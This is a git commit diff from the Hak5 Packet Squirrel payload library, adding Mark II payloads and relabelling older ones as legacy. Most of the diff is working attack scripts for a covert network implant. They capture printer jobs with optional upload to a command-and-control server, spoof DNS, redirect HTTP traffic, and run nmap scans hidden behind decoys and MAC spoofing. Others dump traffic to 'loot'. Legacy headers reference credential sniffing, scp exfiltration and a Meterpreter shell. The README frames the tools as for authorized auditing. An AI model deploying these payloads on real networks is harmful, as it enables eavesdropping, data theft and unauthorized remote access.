Update repos for Packet Squirrel Mk 2 release

pull/40/head
Mike Kershaw / Dragorn 2023-07-24 14:58:18 -04:00
parent 2181bf89e5
commit d3250b4165
56 changed files with 731 additions and 7 deletions

View File

@ -1,39 +1,63 @@
# Payload Library for the Packet Squirrel by Hak5
This repository contains payloads and extensions for the Hak5 Packet Squirrel. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
This repository contains payloads and extensions for the Hak5 Packet Squirrel, developed by the Hak5 Community.
Have a great payload? Submit it by forking the payload repository and submitting a pull request!A
Learn more about Github pull requests [here](https://docs.github.com/en/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests) or from the Hak5 Bash Bunny tutorial [here](https://www.youtube.com/watch?v=H6z9BXevsZg).
## Packet Squirrel Versions
The Packet Squirrel Mark II expands on the capabilities of the original Packet Squirrel, introducing new commands and more flexible networking configurations.
Payloads for the original Packet Squirrel can be found in the `legacy-mk1` directory. These payloads may not work without modification on the Packet Squirrel Mark II.
## About the Packet Squirrel
The Packet Squirrel by Hak5 is a stealthy pocket-sized man-in-the-middle.
The Packet Squirrel Mark II by Hak5 is a stealthy pocket-sized man-in-the-middle.
This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.
- [Purchase at Hak5](https://hak5.org/products/packet-squirrel "Purchase at Hak5")
- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel "Documentation")
- [Documentation](https://docs.hak5.org/packet-squirrel-mark-ii "Documentation")
- [Forums](https://forums.hak5.org/forum/94-packet-squirrel/ "Forums")
- [Discord](https://hak5.org/discord "Discord")
![Packet Squirrel](https://cdn.shopify.com/s/files/1/0068/2142/products/Packet_Squirrel_300x.jpg)
## Updating
If you've downloaded this repository via `git`, you can update to the latest versions of the payloads with `git pull`. If you downloaded as a zip or other file, please download the latest from [github](https://github.com/hak5/packetsquirrel-payloads/).
## Disclaimer
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness or safety. As with any script, you are advised to proceed with caution.
## Legal
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
## Contributing
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publicly available.
Please adhere to the following best practices and style guide when submitting a payload.
Hak5 reserves the right to modify payloads to meet the guidelines when necessary, or to decline to include a payload in the public repository.
Please ensure that any default configuration values do not point to actual services! Do not include *your* passwords or login information in submitted payloads!
### Naming Conventions
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be placed into its own directory, with `-` or `_` used in place of spaces, in one of the categories such as exfiltration, phishing, remote_access or recon. Please do not create your own category.
The payload itself should be named `payload`.
Additional files and documentation can be included in the payload directory. Documentation should be in `README.md` or `README.txt`.
### Comments
Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
# Title: Meterpreter-via-SSH
@ -53,6 +77,7 @@ Payloads should begin with comments specifying at the very least the name of the
# Cyan Blink 1 Time - Meterpreter Successful
### Configuration Options
Configurable options should be specified in variables at the top of the payload.txt file
# Options
@ -61,9 +86,11 @@ Configurable options should be specified in variables at the top of the payload.
MSF_PORT=31337
### LED
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or `NETMODE`.
LED SETUP
NETMODE NAT
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.

75
legacy-mk1/README.md Normal file
View File

@ -0,0 +1,75 @@
# Legacy payloads
These payloads are for the original Packet Squirrel device.
They may or may not run without modification on the Packet Squirrel Mark II.
## Payload Library for the Packet Squirrel by Hak5
This repository contains payloads and extensions for the Hak5 Packet Squirrel. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
## About the Packet Squirrel
The Packet Squirrel by Hak5 is a stealthy pocket-sized man-in-the-middle.
This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.
- [Purchase at Hak5](https://hak5.org/products/packet-squirrel "Purchase at Hak5")
- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel "Documentation")
- [Forums](https://forums.hak5.org/forum/94-packet-squirrel/ "Forums")
- [Discord](https://hak5.org/discord "Discord")
![Packet Squirrel](https://cdn.shopify.com/s/files/1/0068/2142/products/Packet_Squirrel_300x.jpg)
## Updating
If you've downloaded this repository via `git`, you can update to the latest versions of the payloads with `git pull`. If you downloaded as a zip or other file, please download the latest from [github](https://github.com/hak5/packetsquirrel-payloads/).
## Disclaimer
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
## Legal
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
## Contributing
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
Please adhere to the following best practices and style guide when submitting a payload.
### Naming Conventions
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
### Comments
Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
# Title: Meterpreter-via-SSH
# Description: Covert meterpreter shell via overt SSH connection
# Author: Zappus
# Version: 1.0
# Category: Remote-Access
# Net Mode: NAT
# Firmware: 1.2
#
# LED State Descriptions
# Magenta Solid - Configuring NETMODE
# LED OFF - Waiting for BUTTON
# Red Blink 2 Times - SSH Connection Failed
# Amber Blink 5 Times - SSH Connection Successful
# Red Blink 1 Time - Meterpreter Failed
# Cyan Blink 1 Time - Meterpreter Successful
### Configuration Options
Configurable options should be specified in variables at the top of the payload.txt file
# Options
SSH_USER="username"
SSH_HOST="hostname"
MSF_PORT=31337
### LED
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or `NETMODE`.
LED SETUP
NETMODE NAT
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.

View File

@ -1,5 +1,8 @@
#!/bin/bash
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
function run() {
LED STAGE1
SWITCH_POS=$(SWITCH)

View File

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: FreeDaNutz
# Description: This payload will compress the loot folder and then send that file to a remote server via scp

View File

@ -1,5 +1,8 @@
#!/bin/bash
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
function scan() {
LED G
ifconfig wlan0 down

View File

@ -1,4 +1,8 @@
#!/bin/bash
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
LED STAGE1
NETMODE NAT

View File

Before

Width:  |  Height:  |  Size: 95 KiB

After

Width:  |  Height:  |  Size: 95 KiB

View File

Before

Width:  |  Height:  |  Size: 93 KiB

After

Width:  |  Height:  |  Size: 93 KiB

View File

Before

Width:  |  Height:  |  Size: 96 KiB

After

Width:  |  Height:  |  Size: 96 KiB

View File

Before

Width:  |  Height:  |  Size: 55 KiB

After

Width:  |  Height:  |  Size: 55 KiB

View File

Before

Width:  |  Height:  |  Size: 62 KiB

After

Width:  |  Height:  |  Size: 62 KiB

View File

Before

Width:  |  Height:  |  Size: 81 KiB

After

Width:  |  Height:  |  Size: 81 KiB

View File

Before

Width:  |  Height:  |  Size: 64 KiB

After

Width:  |  Height:  |  Size: 64 KiB

View File

Before

Width:  |  Height:  |  Size: 66 KiB

After

Width:  |  Height:  |  Size: 66 KiB

View File

Before

Width:  |  Height:  |  Size: 53 KiB

After

Width:  |  Height:  |  Size: 53 KiB

View File

@ -1,4 +1,8 @@
# Title: Caternet
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Author: Hak5Darren
# Version: 1.0
# Description: Forwards all traffic to local webserver hosting cat photos.

View File

@ -1,4 +1,7 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: DNSSpoof
# Description: Forge replies to arbitrary DNS queries using DNSMasq

View File

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: IP Info
# Author: Hak5Darren
# Version: 1.0

View File

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: NMap Dump
# Description: Dumps NMap scan data to USB storage.
# Author: infoskirmish.com

View File

@ -1,4 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: Meterpreter-via-SSH
# Description: Covert meterpreter shell via overt SSH connection
# Author: Zappus

View File

@ -1,4 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: SSH Remote Management Tool for Packet Squirrel
# Description: Makes packet Squirrel directly accessible via SSH on a remote server
# Author: BlackPropaganda
@ -85,4 +89,4 @@ uci commit autossh
LED ATTACK
# starting autossh
/etc/init.d/autossh start
/etc/init.d/autossh start

View File

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: Togglable-VPN
# Description: Based on the default VPN payload; this can now create a VPN-connection to an OpenVPN-server,
# or if the button is pressed, send traffic from the clients through said tunnel.

View File

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: OpenVPN
# Description: Create a connection to a VPN-connection to an OpenVPN-server. Optionally: Send traffic from the clients through said tunnel.
# Author: Hak5

View File

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: iSpy Passive Intel Gathering
# Description: Launches various tools to sniff out intel data.

View File

@ -1,4 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# ngrep payload to snag creds
NGREP_OPTIONS=("-wiql" "user|pass" "port" "21")

View File

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: TCPDump
# Description: Dumps networking-data to USB storage. Completes on button-press or storage full.
# Author: Hak5

View File

@ -0,0 +1,53 @@
#!/bin/bash
# Title: PCL Printer Capture
# Description: Capture PCL IP printer jobs with a dynamic proxy
# Author: Hak5
# To convert PCL files to PDF, use a tool like GhostPCL:
# https://ghostscript.com/releases/gpcldnld.html
#
# To convert a stream (captured-file.stream) to PDF (printed.pdf), use something
# like:
# ./gpcl6-1000-linux-x86_64 -o printed.pdf -sDEVICE=pdfwrite captured-file.stream
# Do we automatically exfiltrate to Cloud C2? Uncomment to send files to your
# CloudC2 server automatically
#
# USE_C2=1
# By default, C2WATCHDIR removes files after they're sent. To keep them, uncomment
# C2_KEEP_FILES below
#
# C2_KEEP_FILES=1
LED SETUP
NETMODE NAT
# We have to have attached USB
USB_WAIT
# Make sure the directory exists
mkdir /usb/printer/
# If USE_C2 isn't empty, we're uploading to CloudC2
if [[ ! -z "$USE_C2" ]]; then
# If C2_KEEP_FILES is not empty, we want to preserve the
# files on USB, otherwise run C2WATCHDIR normally and delete
# the files after they are sent.
if [[ ! -z "$C2_KEEP_FILES" ]]; then
C2_KEEP_FILES=1 C2WATCHDIR /usb/printer/ &
else
C2WATCHDIR /usb/printer/ &
fi
# Give C2WATCHDIR a moment to sync any old files that were present
sleep 3
fi
LED ATTACK
# Use a dynamic proxy to MITM standard PCL IP printers
DYNAMICPROXY CLIENT /usb/printer/print_ 9100

View File

@ -0,0 +1,32 @@
#!/bin/bash
# Title: Gatekeeper
#
# Description: Toggle access to the network with the pushbutton
# Author: Hak5
# Set the default network mode (such as NAT or BRIDGE)
NETWORK_MODE="BRIDGE"
NETMODE ${NETWORK_MODE}
LED G SOLID
while true; do
# Run the buttom command with no LED; this way the LED stays
# solid green
NO_LED=1 BUTTON
# Check the existing network mode; if we're not the right mode,
# send the target device to jail
if [ $(cat /tmp/squirrel_netmode) == "${NETWORK_MODE}" ]; then
LED R FAST
NETMODE JAIL
LED R SOLID
else
# Set the network mode back to our normal mode
LED G FAST
NETMODE ${NETWORK_MODE}
LED G SOLID
fi
done

View File

@ -0,0 +1,14 @@
#!/bin/bash
# Title: DNS Sinkhole
# Description: Demonstrate sinkholing a DNS domain (hak5.org)
# Author: Hak5
# This payload will intercept any requests for a *.hak5.org domain
# and redirect them to localhost (127.0.0.1 for IPv4 or ::1 for IPv6)
NETMODE BRIDGE
LED R SINGLE
SPOOFDNS br-lan '.*.hak5.org=127.0.0.1' 'hak5.org=127.0.0.1' '.*.hak5.org=::1' 'hak5.org=::1'

View File

@ -0,0 +1,30 @@
#!/bin/bash
# Title: Minimalistic web intercept
# Description: Replace HTTP with Squirrels.
# Author: Hak5
#
# squirrel.jpg from Wikipedia
# https://upload.wikimedia.org/wikipedia/commons/6/68/Sciuridae.jpg
# By Chicoutimi (montage)KarakalAndiWNational Park Serviceen
# User:Markus KrötzschThe Lilac Breasted RollerNico Conradie from Centurion,
# South AfricaHans HillewaertSylvouilleNational Park Service - Own work, CC BY 3.0,
# https://commons.wikimedia.org/w/index.php?curid=10213698
NETMODE NAT
LED B SOLID
# Add a web payload to the nftables
nft add table ip webpayload
# Hook prerouting
nft -- add chain ip webpayload prerouting { type nat hook prerouting priority -100 \; }
# Redirect port 80 to our local 8080
nft add rule ip webpayload prerouting tcp dport 80 redirect to :8080
while true;
do echo -e "HTTP/1.1 200 OK\nContent-Type: image/jpeg\n" | \
cat - /root/payloads/$(SWITCH)/squirrel.jpg | \
netcat -l -p 8080;
done

Binary file not shown.

After

Width:  |  Height:  |  Size: 132 KiB

View File

@ -0,0 +1,30 @@
Title: NMap Dump
Description: Dumps NMap scan data to USB storage.
Author: infoskirmish.com
Version: 2.0
Category: sniffing
Target: Any
Net Mode: NAT
LEDs
SUCCESS: Scan complete
FAIL: No USB storage found
SCANNING: Rapid White
This payload will launch NMap on a given interface (default eth0) and scan the local subnet. There is no need to know the subnet as the payload will capture and infer the subnet from the IP it receives while launching.
The payload will store scan files in all three file types supported by nmap. Also the payload will create a log.txt file to dump process information which may be useful to troubleshoot errors. The default path is /mnt/loot/nmapdump
The payload has common variables that maybe changed located at the top of the file making customizing this payload as your deployment needs dictate.
Updated for the Packet Squirrel Mark II by Hak5

View File

@ -0,0 +1,276 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: NMap Dump
# Description: Dumps NMap scan data to USB storage.
# Author: infoskirmish.com
# Version: 2.0
# Category: sniffing
# Target: Any
# Net Mode: TRANSPARENT
# Updated to the Packet Squirrel Mark II by Hak5
# LEDs
# SUCCESS: Scan complete
# FAIL: No USB storage found
# SCANNING: Rapid White
#### Constants ####
# If you know which interface will allow outbound traffic you can specify it here
# leaving it blank will enable the payload trying to attempt to figure out which
# interface to use.
defaultInterface="lo"
# Number of decoy IPs to spawn
rndDecoyNumber=5
# Spoof the MAC of this device type
spoofDevType="Cisco"
# Seconds to sleep while loading NAT
netSleep=10
# Squirrel NETMODE TRANSPARENT | BRDIGE | NAT | NONE
# BRIDGE mode will preserve the Squirrel IP
mode="BRIDGE"
# When done what should we do? reboot | halt | nothing | poweroff
onEnd="halt"
# Path to store results
lootPath="/usb/loot/nmapdump"
# File name scheme
lootFileNameScheme="nmapdump_$(date +%Y-%m-%d-%H%M)"
# Clear the log every run?
clearLogs=true
#### Payload Code ####
function finish() {
# Sync filesystem
sync
# Indicate successful shutdown
LED B SUCCESS
sleep 1
# Halt the system
LED OFF
case "$onEnd" in
"poweroff") poweroff ;;
"reboot") reboot ;;
"halt") halt ;;
"nothing") echo "see ya!" >> $lootPath/log.txt ;;
*) reboot;;
esac
}
function run() {
# Create loot directory
mkdir -p $lootPath &> /dev/null
# Clear the logs
if [ "${clearLogs}x" == "truex" ]; then
echo > ${lootPath}/log.txt
fi
# Set networking mode to user preferance and sleep to allow time to sync up.
# If set to NONE this will not be set and thus not kick you out of your SSH session.
if [ "$mode" != "NONE" ]; then
NETMODE $mode
sleep $netSleep
fi
# Log ifconfig data; helpful for troubleshooting
ifconfig >> $lootPath/log.txt
# Starting scanning LED (rapid white blink)
LED W VERYFAST
# Run nmap scan with options
# Now lets figure out which interface to use.
iface=$(ip -o link show | awk '{print $2}')
# Set ipv6 default to null
ipv6=""
# Now lets look at the ip addresses assigned to the various interfaces.
while IFS= read -r line; do
# Standardize interface name
line="${line//:}"
# We can skip lo
if [ "$line" != "lo" ]; then
# Get IP Address for Interface.
ifip=$(ifconfig $line 2>/dev/null|awk '/inet addr:/ {print $2}'|sed 's/addr://')
# Make sure result is not null.
if [ "$ifip" ]; then
# Store for later use the ip addresses associted with interface.
# We don't want an empty 1st line.
if [ "$ipaddresses" ]; then
ipaddresses+=$'\n'$ifip
else
ipaddresses=$ifip
fi
# If user has specified a default interface than we can disregard.
if [ ! "$defaultInterface" ]; then
# Store the interface for later use.
# We don't want an empty 1st line.
if [ "$interfaces" ]; then
interfaces+=$'\n'$line
else
interfaces=$line
fi
fi
# convert ip to subnet
newSubNet=`echo $ifip | cut -d"." -f1-3`
newSubNet=$newSubNet".1/24"
# Add subnet to list
# We don't want a leading empty character.
if [ "$newSubNet" ]; then
targets+=" $newSubNet"
else
targets=$newSubNet
fi
fi
fi # end our test for lo
done <<< "$iface" # loop to gather IP addresses
# Clean up subnets to remove accidental double spaces.
echo "$targets" | awk '$1=$1' &> /dev/null
# if targets is empty we have no subnets. Let's check if we can find IPv6
if [ ! "$targets" ]; then
# Collect all uniqu IPv6 address that we can ping.
ipv6=$(ping -6 ff02::1 -w 10 2>/dev/null | awk '/from/ {print $4}' | cut -d":" -f1-6 | sort | uniq | tr "\r\n" " ")
if [ ! "$ipv6" ]; then
# We could not find any ipv4 address and ipv6 returned nothing.
echo "Could not accquire any IP addresses to scan." >> $lootPath/log.txt
sync
LED OFF
exit 1
fi
fi
# Add lo as some setups the loopback maybe the interface to send out traffic
# If user supplies default interface tie in their selection and disregard the
# auto locate data.
if [ ! "$defaultInterface" ]; then
interfaces+=$'\nlo'
else
interfaces=$defaultInterface
fi
# log subnets and ip addresses we found
echo "Subnets to scan $targets" >> $lootPath/log.txt
echo "IPs to scan $ipaddresses" >> $lootPath/log.txt
# Document the fact we will be scanning ipv6
if [ "$ipv6" ]; then
echo "We will be scanning ipv6 addresses" >> $lootPath/log.txt
fi
# Now lets find the interface that will allow outbound traffic on the LAN.
while IFS= read -r interface; do
# We will use the ip addresses we found to see if this interface can ping it.
while IFS= read -r ip; do
# If we can send ping packets then the interface is likley able to work with nmap
# Determin if we should ping in ipv4 or ipv6
if [ ! "$ipv6" ]; then
if [[ ! $(ping -I $interface $ip -w 3 | grep '0 packets received') ]]; then
# Make sure wee don't end up with a blank first line.
if [ "$goodInterface" ]; then
goodInterfaces+=$'\n'$interface
else
goodInterfaces=$interface
fi
fi
else
if [[ ! $(ping -6 ff02::1 -w 3 | grep '0 packets received') ]]; then
# Make sure wee don't end up with a blank first line.
if [ "$goodInterface" ]; then
goodInterfaces+=$'\n'$interface
else
goodInterfaces=$interface
fi
fi
fi
done <<< "$ipaddresses" # end loop to find interfaces we can use
done <<< "$interfaces" # end loop to scan interfaces
# Log interfaces we can use
echo "Interfaces allowing outbound traffic: $goodInterfaces" >> $lootPath/log.txt
# Make sure we have interfaces that will allow outbound traffic.
if [ "$goodInterfaces" ]; then
while IFS= read -r goodInterface; do
# Finally! Lets run NMap!
# Use ipv4
if [ ! "$ipv6" ]; then
nmap -Pn -e $goodInterface -sS -F -sV -oA $lootPath/$lootFileNameScheme -D RND:$rndDecoyNumber --randomize-hosts --spoof-mac $spoofDevType $targets >> $lootPath/log.txt
else
# Use ipv6
nmap -Pn -e $goodInterface -sT -F -R -oA $lootPath/$lootFileNameScheme --randomize-hosts --spoof-mac $spoofDevType -6 $ipv6 >> $lootPath/log.txt
fi
done <<< "$goodInterfaces"
else
echo "Could not find any interfaces that will allow outbound traffic." >> $lootPath/log.txt
exit 1
fi
# Done scanning; clean up.
finish
} # end run() function
USB_WAIT
# Show attack LED
LED ATTACK
# ATTACK!!!!
run

View File

@ -0,0 +1,7 @@
# Wake-on-LAN
This payload generates a WoL (Wake-on-LAN) magic packet for the devices listed in the
payload configuration.
Make sure to copy BOTH `payload` and `wol_python.py` to the SAME payload directory on
the Packet Squirrel!

View File

@ -0,0 +1,37 @@
#!/bin/bash
# Title: Wake on Lan
# Description: Wake On Lan with Python
# Author: Hak5
# Configuration
# MAC addresses, separated by spaces
WOL_TARGETS="11:22:33:44:55:66 AA:BB:CC:DD:EE:FF"
# How often do we wake up systems, in seconds?
WOL_INTERVAL=30
# NAT mode
NETMODE NAT
# Set the LED
LED G SINGLE
while true; do
# Toggle the LED, send the WoL
LED W SOLID
python /root/payloads/$(SWITCH)/python_wol.py ${WOL_TARGETS}
# Wait one second for the LED to be visible
sleep 1
# Reset the LED
LED G SINGLE
# Wait the wakeup interval
sleep ${WOL_INTERVAL}
done

View File

@ -0,0 +1,21 @@
#!/usr/bin/python
import sys
import socket
# Simplified function to send a wake-on-lan packet
def send_wol(destination):
sync = "FF" * 6
macs = destination * 16
payload = bytes.fromhex(sync + macs)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(payload, ("255.255.255.255", 9))
# Send a WoL packet for each MAC address we
# were called with
for mac in sys.argv[1:]:
fin_mac = mac.replace(":", "")
send_wol(fin_mac)

View File

@ -0,0 +1,72 @@
#!/bin/bash
#
# Title: TCPDump
# Description: Dumps networking-data to USB storage. Completes on button-press or storage full.
# Author: Hak5
# Version: 1.0
# Category: sniffing
# Target: Any
# Net Mode: TRANSPARENT
# LEDs
# SUCCESS: Dump complete
# FAIL: No USB storage found
function monitor_space() {
while true
do
[[ $(USB_FREE) -lt 10000 ]] && {
kill $1
LED G SUCCESS
sync
break
}
sleep 5
done
}
function finish() {
# Kill TCPDump and sync filesystem
kill $1
wait $1
sync
# Indicate successful shutdown
LED R SUCCESS
sleep 1
# Halt the system
LED OFF
halt
}
function run() {
# Create loot directory
mkdir -p /usb/loot/tcpdump &> /dev/null
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE TRANSPARENT
sleep 5
LED ATTACK
# Start tcpdump on the bridge interface
tcpdump -i br-lan -s 0 -w /usb/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
tpid=$!
# Wait for button to be pressed (disable button LED)
NO_LED=true BUTTON
finish $tpid
}
# This payload will only run if we have USB storage
# Wait for the USB drive
USB_WAIT
LED ATTACK
run &
monitor_space $! &
wait